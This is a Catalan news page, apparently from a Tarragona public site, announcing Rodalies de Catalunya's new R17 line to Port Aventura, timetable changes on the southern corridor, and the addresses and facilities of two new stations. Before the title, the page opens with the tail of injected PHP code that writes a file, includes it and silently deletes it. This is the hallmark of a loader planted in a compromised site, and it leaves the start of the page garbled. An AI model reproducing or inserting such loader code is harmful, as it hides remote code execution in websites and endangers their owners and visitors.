");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Rodalies de Catalunya crea la nova línia R17 que enllaçarà Tarragona amb Port Aventura i es reconfiguren els serveis Regionals del corredor sud
Iconos cabecera

Destaquem

  • SEM 2021SEM 2021
    Setmana Europea de la Mobilitat 2021

Rodalies de Catalunya crea la nova línia R17 que enllaçarà Tarragona amb Port Aventura i es reconfiguren els serveis Regionals del corredor sud (10/01/2020)

A partir del 13 de gener, la posada en funcionament de la nova variant permetrà a Rodalies de Catalunya reconfigurar a els serveis Regionals del Corredor Sud. Reconfigurar els serveis Regionals del Corredor Sud. La principal novetat és la creació de la nova línia R17 que enllaçarà Tarragona amb Port Aventura. Quan el parc estigui obert un servei per sentit es prolongarà fins a Barcelona i a l'estiu s'afegirà una altra freqüència entre la Ciutat Comtal i Port Aventura.

D'altra banda, es traslladen els serveis de la línia R16 a la nova variant el que provocarà lleugeres modificacions horàries. Derivat d'aquest canvis es registrarà un reajustament horaris a la resta de línies de Rodalies de Catalunya que circulen per l'àmbit de Tarragona.

Les noves estacions de Cambrils i l'Hospitalet de l'Infant disposen de pàrquing i parades de bus i taxi, i estan situades a les següents adreces:

CAMBRILS: Avinguda de Charles Robert Darwin, s / n 43850 Cambrils (Tarragona)

Coordenades: 41º 4,52.89 '' N 1º 2,46.09 '' E

Serveis: Ascensors, cafeteria, WC públics, pàrquing, parades de bus i taxi

L'HOSPITALET DE L'INFANT: Plaça de l'Estació s / n, 43891 L'Hospitalet de L'Infant (Tarragona)

Coordenades: 40º 59,56.94 '' N 0º 54,46.60 '' E

Serveis: WC públics, pàrquing, parades de bus i taxi, cafeteria (en servei properament)

Font: Rodalies de Catalunya

[Tornar a Notícies]

 
Carrer d' Anselm Clavé, 1 43004 - Tarragona